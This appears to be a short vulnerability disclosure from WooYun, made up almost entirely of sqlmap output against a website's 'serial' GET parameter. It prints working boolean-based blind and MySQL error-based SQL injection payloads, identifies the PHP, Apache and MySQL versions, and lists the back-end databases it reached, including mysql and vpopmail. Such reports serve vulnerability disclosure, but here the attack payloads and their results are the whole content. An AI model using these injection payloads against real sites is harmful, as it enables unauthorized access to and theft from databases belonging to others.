WooYun.org

注入参数：
Parameter: serial (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: serial=5629 AND 2829=2829&email=xxxxxxx@gmail.com
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: serial=5629 AND (SELECT 2347 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(2347=2347,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a)&email=xxxxxxx@gmail.com
---
[21:13:21] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.13, Apache 2.2.15
back-end DBMS: MySQL 5.0
[21:13:21] [INFO] fetching database names
[21:13:21] [INFO] the SQL query used returns 5 entries
[21:13:21] [INFO] resumed: information_schema
[21:13:21] [INFO] resumed: ezem
[21:13:21] [INFO] resumed: mysql
[21:13:21] [INFO] resumed: test
[21:13:21] [INFO] resumed: vpopmail
available databases [5]:
[*] ezem
[*] information_schema
[*] mysql
[*] test
[*] vpopmail